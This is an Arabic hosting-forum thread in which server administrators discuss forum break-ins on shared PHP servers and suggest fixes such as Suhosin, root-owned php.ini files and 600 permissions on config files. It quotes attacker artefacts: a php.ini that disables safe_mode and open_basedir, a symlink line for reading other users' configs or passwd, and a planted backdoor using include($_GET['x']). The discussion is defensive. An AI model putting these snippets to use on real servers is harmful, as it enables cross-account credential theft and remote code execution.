اختراقات المنتديات على السيرفر من خلال php.ini وثغرة التوصيل

[majed2002]

السلام عليكم ورحمة الله وبركاته ...


حاليا اواجه نوع جديد من الاختراق عن طريق ربط منتدى على منتدى اخر في نفس السيرفر فلا اعلم ما الهدف حتى الان لكن الظاهر انهم استغلال في التحكم بطريقه اخرى فمثلا ً
يتم رفع ملف txt عبر الاف تي بي في مجلد المنتتدى ويحتوي على ملف كونفيج لكن اسمه بالاخيره .txt ومحتويات الكونفيج متصله بقاعدة بيانات على منتدى ثاني في نفس السيرفر

مثال :

كود PHP:

ff.txt -> /home/xxxx/public_html/includes/config.php 


ويتم رفع ملف اخر في المنتدى وهو :

php.ini

ومحتوياته هي :

كود PHP:

safe_mode                =           off
disable_functions = none
open_basedir = 


ومن خلاله يصبح المنتدى مفتوح امام المخترق بدون اي مشاكل

وايضا ً مشكله اخرى وهو تواجد ملف داخل التمب الخاص بالسيرفر ويدعى

كود PHP:

/tmp/sh* 


اعتقد ان له علاقه بالاختراق في المنتديات فهل من حلول لهذه المشاكل

وجزاكم الله خير ...

[كارم ابراهيم]

اولا ارجع ل apache model فورا ثانيا ثم قم بفحص سيرفرك جيدا لو محتاج مساعدة حاضر ان شاء الله بالتوفيق

[majed2002]

ان شاء الله يكون هالموضوع مرجع لسوالف واعضاء سوالف واول ما القى حل لهذي المشكله ان شاء الله بعمل تحديث لهذا الموضوع

مشكور اخوي كارم وننتظر المزيد

[majed2002]

اخر ما توصلنا اليه

تشفير ملفات الشيل وهذه الطامه الكبرى

ملف شيل ومشفر كيف تكتشفه ؟

اغلاق الزند ممكن يضر عملاءك لانه معظم السكربتات تحتاج زند
مال الحل !

جاري البحث عن حل لهذي المشكله

[محمد الهاجري]

majed2002

ركب رقعة php

Suhosin

لما يرفع ملف شل راح يطلع له صفحة بيضاء او صفحة تحددها انت

هذا شرح له واشوف محد اهتم فيه مادري ليه

http://www.swalif.net/softs/swalif68/softs200202/

بنظري انه مهم تواجده بكل سيرفر

[JeddaHost]

majed2002

ركب رقعة php

Suhosin

لما يرفع ملف شل راح يطلع له صفحة بيضاء او صفحة تحددها انت

هذا شرح له واشوف محد اهتم فيه مادري ليه

http://www.swalif.net/softs/swalif68/softs200202/

بنظري انه مهم تواجده بكل سيرفر

صحيح ولكن اذا رفعت php.ini ال Suhosin يتقفل !!!

وبالنسبة للشرح لايكفي لكي يغلق ملفات الشـل

يحتاج يحط إعدادات

مع تحياتي

[majed2002]

majed2002

ركب رقعة php

Suhosin

لما يرفع ملف شل راح يطلع له صفحة بيضاء او صفحة تحددها انت

هذا شرح له واشوف محد اهتم فيه مادري ليه

http://www.swalif.net/softs/swalif68/softs200202/

بنظري انه مهم تواجده بكل سيرفر

واذا ملف الشيل مشـفّـر !! :con2:

[JeddaHost]

نفس الشي يتم إيقافة

ولكن المشكلة من ال php.ini بعد تفعيل ال phpSUEXEC

مع تحياتي

[محمد الهاجري]

حتي لو الملف مشفر لن يعمل

انا طبعا اتكلم بحيث ان phpSUEXEC لا يعمل طبيعي ولا احب تفعيله

JeddaHost ممكن تفيدنا بالاعدادات اللي ذكرت؟

شكرا

[Gmc.9]

كود:

 safe_mode = off 
disable_functions = none 
open_basedir =

طبعناً كما هو واضح بهذا الكود يتم تخطي الـسيف مود وتصفير الدوال ...الخ

بـ ملف (php.ini) شغاله بصلاحية الUser فقط ولا تشتغل مثل هل ثغرة بـ صلاحية الـنوبادي + الأباتشي .

واعتقد أنها ماتفيد المخترق كثير الأ بـ B4ckd005 وتنفع للExp|0!ts إلي ماتشتغل معـك الأ والسيف مود مغـلق

نصيحه لجميع الأخوه محتاجة تحمي سيرفره الشخصي وغيره من الأختراقات وترقيع الثغرات بـالمواقع السيكيورتي وصدقـني مب كل شئ بينزل بالمواقع العربيه ,

واولاٍ
MilW0rm.com

ولله يوفقكم ويستر عليكم

[Gmc.9]

نفس الشي يتم إيقافة

ولكن المشكلة من ال php.ini بعد تفعيل ال phpSUEXEC

مع تحياتي

ممكن طرح طريقة عدم تنفيذ أى امر ينكتب داخل PHP.!NI?

بإنتظارك

[ThE Spirit]

السلام عليكم ..

كنت مقرر ابتعد عن سوالف نهائيا .. بعد الاحداث الاخيره فيها و لكن قررت اضع هالرد بعد ما شفت المهزله اللي صايره بسبب هالثغره و غيرها من الثغرات اللي انتشرت و شرحت من ناس "الله يعينها على انفسها " ..

عموما .. ركز بكلامي و اللي ما تفهمه تفضل و اسأل

طبعا دامك تقول ان السيف مود توقف بمحتوى ال php.ini اللي وضعته ..

فهذا يعني انك شغال بالموديل suexec المتعارف عليه بصلاحية اليوزر او ما شابه عند الاغلبيه ..

و المؤسف طبعا ان نسبة كبيره جدا جدا من العرب اللي يستخدمون هالموديل ما يدرون بأهم نقاط الحمايه و الكوارث اللي ممكن يتسبب بها ..

طبعا حسب اعدادات الاغلبيه الحين .. ان الشخص يتصرف باعدادات php.ini الخاصه بموقعه .. و بالطبع هذي ميزة لا بد من اخذ الحيطه قبل السماح بها .. لان الشخص ممكن يتصرف بأإي من اعدادات السيرفر عن طريق هالملف .. و منها تعطيل السيف مود و الخ .. و تعطيله و ما الى ذلك ممن اشياء يترتب عليها الكثير..

طبعا انا عندي حلّ و اللي مستعد يطبقه حيّاه الله ..
الحل هو وضع مجلد خاص باعدادات ال php.ini لكل موقع افتراضيا يتم وضعه
/home/user/ini
و يتم وضع ملف php.ini صلاحيته للروت

طبعا تضع انت فيه اعدادات افتراضيه تبيها للموقع نفسه
اذا لا قدر الله و واحد بغى مثلا يتحكم بالملف هذا
يكلم الروت و يعدل اللي يبيه و بكذا تعديل للسيف مود او غيره
يتم بأمر من الروت و بكذا انت مسكت زمام الامور في هذا الموديل اللي بحدين و يجب الحذر الشديد بالتعامل معه .. لان له من الايجابيات الكثير و ما يمكن ننساها ..

و النقطه الثانيه اللي وضعتها و هي كما اطلقت عليها "ثغرة التحويل"

هذي ثغرةه قديمه جدا جدا و لكن من الشئ المؤسف فعلا انها انتشرت في الاونه الاخيره و جزى الله صاحبها الف خير ما قصر بأخوانه ..

الثغره هي تسمى بثغرة symlink
و هي عمل ارتباط لملف معين بالسيرفر

و استغلالها المنشور هو عن طريق كود php

كود PHP:

@symlink('localpath/1.txt','/pathtofiletoread/'); 


و بكذا يطلب ملف 1.txt و يكون فيه محتوى الملف المطلوب سواء ليوزر ثاني بالسيرفر او احد ملفات السيرفر passwd و غيرها
مثل ما حطيت انت هو عمل ارتباط لملف الكونفيج لشخص ثاني بالسيرفر
و عند طلب ملف ff.txt تحصل محتوى ملف الكونفيج فيه

طبعا ثغرة خطيره و تكلف الكثير و الكثير لمستخدمين موديل suexec خاصة

و لكن مثل ما نلاحظ التطبيق يتم عن طريق ملف php
و يطلب اغلاق السيف مود و الدوال
و هذا اللي هو متوفر لهم في موديل suexec .. بالاعدادات اللي يستخدموه الكل حاليا
عن طريق ملف php.ini بس لو تم تطبيق الطريقه اللي طرحتها و الاعدادات كانت اعدادات جيده فيه هالملف لتم تلافي نسبة كبيره من هالاختراقات و المشاكل اللي صايره

و انا هنا بحط حل خاص للاخوان و باختصار شديد !

ضع التصريح 600 للملفات الهامه مثل الكونفيج و غيرها اذا كانت صلاحية السيرفر عندك "يوزر" .. الخ
الصلاحيه هذي بتقهرهم و توقف هالعقول المتحجره عند حدها بالثغره اللي ذكرتها بموضوعك و ما لها اي تأثير طبعا

لان الوضع او التصريح الافتراضي لملف الكونفيج هو world readable
و هذا شي طبعا ما يحتاجه.


و هذا السلام عليكم

و استودعكم الله

[محمد الهاجري]

ThE Spirit

ردك مهم جدا بارك الله فيك

كلام منطقي جدا

[majed2002]

اخوي ThE Spirit داخل المووضوع وانته معصب فبكذه ما وضحت بعض النقاط اللي راح ارجع لك فيها ونستفيد جزاك الله خير
وبما انك كنت هنا يوما ً ... فنتمنى بقاءَك دوما ً ...

هذا الشائع اخوي ThE Spirit في الاختراقات الحاليه ...


هذا كود من بعض الاكواد المزروعه التي تم ايجادها من خلال المخترق ..

كود PHP:

$f=trim($f);
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("$f");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("$f");
include($_GET['x']); 


Symlink Tools to bypass user
هذا هو نظام ربط الملفات للتحكم عن بعد ممكن نقول لانه الموقع يتضرر وانته على بالك اشياء من الموقع ...

كشفت امور كثيره من خلال هالتصرف الغبي ولله الحمد تم التغلب على 80% من الاختراق لكن فقط شي واحد بقى على الاختراق هوه اختراق الفورم هوم عبر المنتدى وهذا غالبا يكون من المنتدى نفسه وترك ملفات الانستول موجوده في الموقع وعدم تامين المنتدى بحماية خفيفه على الاقل فقط لا غير


فهل هذا الحل يكفي !!

[الغريب همام]

السلام عليكم ..
كنت مقرر ابتعد عن سوالف نهائيا ..
و استودعكم الله

عليك السلام يا الغالي ورحمة الله

لا لا ما يصير كذا يا الغالي ، أبدا ما يصير ، وش ذا الكلام الله يهديك ، استهدي بالله يا الغالي ThE Spirit .

كثيرون والله لم يرضهم جوانب التحول السلبي للسوالف حتى أصبحت في تعامل مشرفيها كأننا في روضة أو ابتدائية ، ولكن يا عزيزي ThE Spirit ابقى ولو من أجل اخوانك والارتقاء بأخيك المسلم للمستوى العالي الذي يستطيع يواجه فيه المخترقين او يطور حاله إلى الاكتفاء الذاتي .

إن كان هانت عليك سوالف ، فلا يهون عليك بعض شباب سوالف الحريصين على الفائدة الصادقين في التعامل في العسر واليسر ، من يقولون للمخطأ أخطأت وللمصيب أحسنت .

جوانب من التحول لسوالف إيجابي وله نقول أحسنت وجوانب لها سلبي نقول لها أخطأت وبما أننا لا نملك زمام الأمور فما بيدنا حيلة إلا النصح .

لا تستودعنا يا الغالي ThE Spirit عد لنا وابق معنا والله يوفقنا وإياك لم يحب ويرضى .